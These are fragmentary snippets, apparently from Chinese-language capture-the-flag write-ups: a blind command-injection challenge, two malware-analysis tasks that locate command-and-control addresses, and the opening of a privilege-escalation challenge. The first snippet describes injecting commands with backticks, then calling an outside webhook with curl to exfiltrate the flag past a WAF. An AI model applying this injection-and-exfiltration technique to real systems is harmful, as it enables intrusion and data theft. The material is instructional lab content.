webnslookup final有command injection，用``把指令包起來，但是會有一個問題就是他不會回傳結果， curl webhook.trianglesnake.com/?text=123 呼叫聊天機器人webhook試試看，有收到訊息，所以直接把flag偷出來 因為有WAF限制flag、*，但我知道flag的prefix了，所以直接遍歷根目錄檔案找出flag `curl -G https://eec1-182-234-154-17.n ...

惡意軟體分析 [name=trianglesnake]flag:||10.15.1.69:3128||難度:中 打開ida pro 查看import table 查看是否有網路連線相關api 查看 WinHttpOpen functoin的Reference 在edi中找到中繼伺服器ip和port 惡意軟體分析2 [name=trianglesnake]flag:||flag{5.39.218.152}|| 加密系統 [name=tria ...

Binary ExploitationhijackingAUTHOR: THEONESTE BYAGUTANGAZA Description Getting root access can allow you to read the flag. Luckily there is a python file that you might like to play with. Through Social engineering, we've got the cred ...